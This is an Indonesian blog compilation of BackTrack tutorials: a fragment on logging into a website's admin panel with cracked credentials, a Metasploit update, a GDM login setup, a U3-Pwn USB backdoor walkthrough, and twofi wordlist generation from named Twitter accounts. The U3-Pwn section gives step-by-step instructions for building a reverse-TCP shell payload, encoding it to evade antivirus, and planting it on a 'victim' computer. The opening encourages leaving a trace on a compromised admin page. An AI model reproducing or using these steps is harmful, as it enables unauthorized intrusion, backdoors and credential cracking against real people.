Lihat gambar, kita login dengan username dan password tadi yang sudah kita crack dengan john the ripper.

Maka akan terlihat dengan jelas halaman login dari isi website tersebut. Jika anda setelah login
Terpampang dengan jelas gambar di atas halaman menu admin dari website. Anda bisa memperigati admin tersebut dengan meninggalkan jejak dan ingat sekali lagi tutorial ini bukan untuk merusak system ☺



Penutup 


Demekian tutorial yang kami buat, semoga dapat bermanfaat dan memberikan pelajaran terhadap system keamanan website yang kita buat.

Sumber : http://maubacabaewis.blogspot.com/2013/03/belajar-hacking-website-untuk-pemula.html

Update Metasploit Framework di BackTrack 5 R 2

Update Metasploit Framework di BackTrack 5 R 2

Ketika pertama kali menjalankan metasploit melalui msfconsole pada BackTrack 5 R 2, terlihat metasploit belum up to date ( update terakhir 17 hari yang lalu :




Sesuai dengan referensi yang ada di https://community.rapid7.com/docs/DOC-1306 , update metasploit dilakukan dengan mengetikkan perintah msfupdate




Tunggu beberapa saat hingga proses update tersebut selesai dengan baik.

Selanjutnya, silahkan jalankan kembali msfconsole




Selamat !! metasploit telah terupdate pada versi terbaru metasploit v4.3.0 ( saat tulisan ini ditulis ) .
  1. Categories:
  2. Exploitation Tools
Tags: backtrack 5 r 2, metasploit, msfconsole, msfupdate, update metasploit

Sumber :http://indobacktrack.or.id/content.php?255-Update-Metasploit-Framework-di-BackTrack-5-R-2

Mengubah Backtrack 5 ke Mode Grafis tanpa "startx"

Mengubah Backtrack 5 ke Mode Grafis tanpa "startx"

Membuat backtrack menjadi lebih mendekati mode desktop dengan menghilangkan mode 'startx'


- Pertama, tambahin dulu repo ubuntu 10.04.
- Install synaptic, sudo apt-get install synaptic

- Install paket GDM...


Setelah GDM berhasil diinstal, kita akan mendapatkan sebuah menu baru "Login Screen" dibawah menu System -->> Administration...



Kemudian, tambahin user baru. Secara default BackTrack menggunakan root sebagai user.
Ketik adduser

ato install gnome-system-tools



Jalankan user-admin melalui menu System --> Administration --> Users and Groups untuk membuat user baru. Pada jendela "Users Settings" tekan tombol "Add". Pada jendela "Create New User", silahkan masukkan nama lengkap user yang akan dibuat pada kolom "Name" dan masukkan username yang akan digunakan untuk login pada kolom "Short Name:"...


Pada jendela "Change User Password" pilih opsi pertama "Set password by hand" lalu masukkan password yang Anda inginkan pada kolom "New password:" dan ketik ulang password tersebut pada kolom "Confirmation:"...


Nah, skarang kita udah punya user baru, atur user tersebut agar memiliki hak akses administratif dengan memasukkannya ke dalam group "sudo". Pilih user yang dikehendaki lalu tekan tombol "Manage Groups". Pada jendela "Groups settings" cari group bernama "sudo" lalu tekan tombol "Properties". Pada jendela "Group 'sudo' Properties" centang nama user untuk memasukkan user yang Anda inginkan ke dalam "Group Members" sudo, tekan "OK" lalau tutup semua jendela pengaturan user dan group...


Lakukan konfigurasi manual agar service GDM dijalankan secara otomatis saat startup. Jalankan terminal lalu ketik perintah berikut;

gedit /etc/rc.local

Sisipkan baris perintah "service gdm start" tepat di atas baris "exit 0" (lihat gambar untuk lebih jelasnya)...


Simpan perubahan rc.local lalu tutup jendela gedit.

Silahkan restart komputer, nah kini BackTrack 5 secara otomatis masuk ke mode grafis dengan menggunakan GDM sebagai desktop manager...


Pilih user yang telah Anda buat lalu masukkan passwordnya. Tekan enter atau klik tombol "Log In" untuk masuk ke desktop Gnome. Bagai mana cara untuk masuk ke sistem menggunakan user root dengan GDM ini?, itu sangat mudah, silahkan pilih "Other.." lalu masukkan "root" pada "Username:", tekan enter lalu masukkan password root dengan "toor" lalu tekan enter maka Anda akan masuk ke sesi desktop Gnome sebagai root...



Selamat mencoba...
Tags: backtrack 5

Sumber : http://indobacktrack.or.id/content.php?257-Mengubah-Backtrack-5-ke-Mode-Grafis-tanpa-startx

Cara menggunakan U3 Pwn Di Backtrack

Cara menggunakan U3 Pwn

Ditahun-tahun yang lalu kita mungkin masih mengingat UFD yang memiliki U3 chipset dapat digunakan sebagai usb tools hacking. beberapa diantaranya dikenal sebagai USB switchblade dan USB Hacksaw dimana program tertentu diinjeksikan kedalam chipset u3 untuk "mengemulasikan cdrom drive" yang akan mengeksekusi program yg diinjeksikan tersebut (autoplay). output yg dihasilkan oleh program ini berupa informasi2 hash password LSA, IP information, browser history hingga cookie auto fill information.

U3 Pawn masih menggunakan metode yang sama dengan usb switchblade, akan tetapi code program di injeksikan bukan ditujukan untuk memanen informasi2 dari komputer korban melainkan membuat/menjalankan backdoor pada port tertentu. Uniknya proses yang dijalankan berada didumping memory (tidak membuat file baru di komputer korban) sehingga saat dilepas dari komputer korban background prosesnya masih tetapa berjalan selama masih dalam sesi yang sama (tidak di restart)..

Requirement :



The step:
- Masukkan UFD U3 anda ke usb port.
- Install U3 tool kedalam Linux anda
apt-get install u3-tool

- Download U3 Pwn.tar.gz

- Ekstrak U3-Pwn.tar.gz
wget tar xzvf U3-Pwn.tar.gz

- Jalankan U3-pwn.tar.gz
cd /root/U3-Pwn
python U3-Pwn.py

- Pilih 1 untuk men-Generate & Replace Iso Image
Enter the number: 1

- Pilih 1 untuk memilih payload exploit (Windows Shell Reverse_TCP) yang akan dijalankan
Enter number: 1


- Pilih 2 untuk memilih shikata_ga_nai sebagai encoder untuk melewati firewall dan antivirus.
Enter the number: 1

- Masukkan no ip host anda serta port backdoorny, ip lan atau bisa juga ip publik yang anda dapatkan dari ISP
ex: dalam kasus ini saya menggunakan backtrack sebagai host yang mendapatkan ip 192.168.56.101 sedangkan korban memiliki IP 192.168.56.1
Enter Ip Address for reverse listener: 192.168.56.101

Enter the port of the Listener: 4444

- Masukkan letak UFD di linux ex:sdb1
Enter the device to change iso image on (example /dev/sde1): /dev/sdb1


~ .__ °.__ 0 o ^ .__ °__ `´
°____) __ __| | | °| ______°____ 0 ____ __ _________|__|/ |_ ___.__.
/ \| | °\ |°| | °/ ___// __ \_/ ___\| | °\_ __ \ o\ __< | |
| o°| \ | / |_| |__\___ \ ___/\ °\___| o| /| | \/ || |° \___ O|
|___| /____/|____/____/____ °>\___ >\___ >____/ |__|° |__||__| / ____|
`´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/ ``´```´```´´´´`´``0_o\/´´`´´

************************************************** **********************
U3-Pwn Metasploit Payload Injection Tool For SanDisk Devices
************************************************** **********************


Generating Shellcode Please Wait...
|************************************************* *| 100%
OK


- Pilih yes untuk menjalan exploit handler
Do you want to start a listener to receive the payload yes or no: yes

- Unplug UFD
- Masukkan UFD ke komputer korban
- Tunggu beberapa saat dan komputer korban akan membuka backdoornya untuk komputer host....selanjutnya terserah anda...)


related link:
http://packetstormsecurity.org/files...tion-Tool.html
  1. Categories:
  2. Exploitation Tools
Tags: backdoor, metasploit, u3pwn

Sumber : http://indobacktrack.or.id/content.php?303-Cara-menggunakan-U3-Pawn

Membuat Wordlist Dengan TWOFI di Backtrack

Membuat Wordlist Dengan TWOFI di Backtrack

Siapa yg tak kenal dengan twitter, berdiri sejak tahun 2006 seketika mendapat sambutan luas di dunia maya. Hingga sekarang istilah follow me, RT menjadi kata2 yang rutin diketik dan muncul oleh para usernya, tak hanya hitungan detik, sepersekian sekon jutaan twit terlontar melalui media ini. didukung olehbanyak device yang mendukung aplikasi ini serta kemudahan lainnya, twitter terbukti mampu merombak cara komunikasi kita saat ini. tapi hal ini juga membawa dampak buruk kecanduan pada para penggunanya.

Namun seorang researcher di bidang IT, Joshua Dustin melihat hal ini dengan cara yang berbeda. Dia memandang jutaan kata yang terlontar lewat akun twitter memiliki potensi untuk meng_generate worldlist guna memecahkan enkripsi sebuah data. Dalam blognya ia memperlihatkan bagaimana twitter menjadi gudang kosa kata dalam pembuatan wordlist untuk cracking dan kemudian ia kembangkan menjadi dsatu aplikasi bernama "twofi".
Relevan pemaparan singkat diatas, maka dalam postingan kali ini saya sedikit mengulas bagamana pemakaian twofi...ok here we go

requirement:

  • PC/notebook yg sudah memakai Linux OS (dalam hal ini saya menggunakan backtrack 5 r2...blum upgrade)
  • Aplikasi twofi
  • list user twitter yang akan digunakan dalam proses pembuatan wordlist (sy menggunakan string yg bersumber dr beraneka macam user mulai akun berita hingga public figure yakni "detikcom,tvOneNews,korantempo,desianwar,boediono, enda,tifsembiring,nukman,budip,triomacan2000")

Step
- Login sebagai root dan instal twofi dr repo (jika anda telah menggunakan Backtrack 5 R3, step ini bisa anda skip)
apt-get install twofi

- Jalankan twofi di menu

backtrack - privilege escalation - passwords Attacks - offline Attacks - twofi


disini kita akan lihat beberapa option bantuan tentang penggunaan twofi
-c : akan memperlihatkan jumlah frekuensi kemunculan sebuah kata2 dlm sebuah akun twitter (ex: -c )
-m : set jumlah minimal huruf dalam satu kata yang akan dipilih/filter kedalam file output wordlist (pemakaian: -m 6 utk min 6 huruf/karakter dlm satu kata)
-T : menggunakan sebuah filelist term
-t : menggunakan term langsung
-U : utk opsi ini anda harus membuat sebuah file txt yang berisi list target user yg akan digunakan dlm proses pembuatan wordlist (ex: -U /root/listuser.txt ).
contoh file list user : download
-u : opsi ini sebagai alternatif dr opsi -T dimana anda hanya perlu menuliskan nama user tanpa harus menggunakan sebuah file (ex: -u detikcom,tvOneNews,korantempo )
-v : untuk menggunkan mode verbose


- Proses pembuatan wordlistnynya bisa lewat 2 cara:
*penggunaan tanpa file list user:
ruby twofi.rb -m 6 -u detikcom,tvOneNews,korantempo,desianwar,boediono,e nda,tifsembiring,nukman,budip >> /root/newlist.lst

*penggunaan dengan file list user:
ruby twofi.rb -m 6 -U /root/listuser.txt >> root/newlist.lst

dan hasilnya wordlist bisa dilihat di folder root
gedit /root/newlist.lst


OK...slamat mencoba

related link:
http://hack.pauvam.com/rssposts/tag/glen-roberts/
http://www.digininja.org/twofi.php
 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Belajar Dasar-Dasar TKJ - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger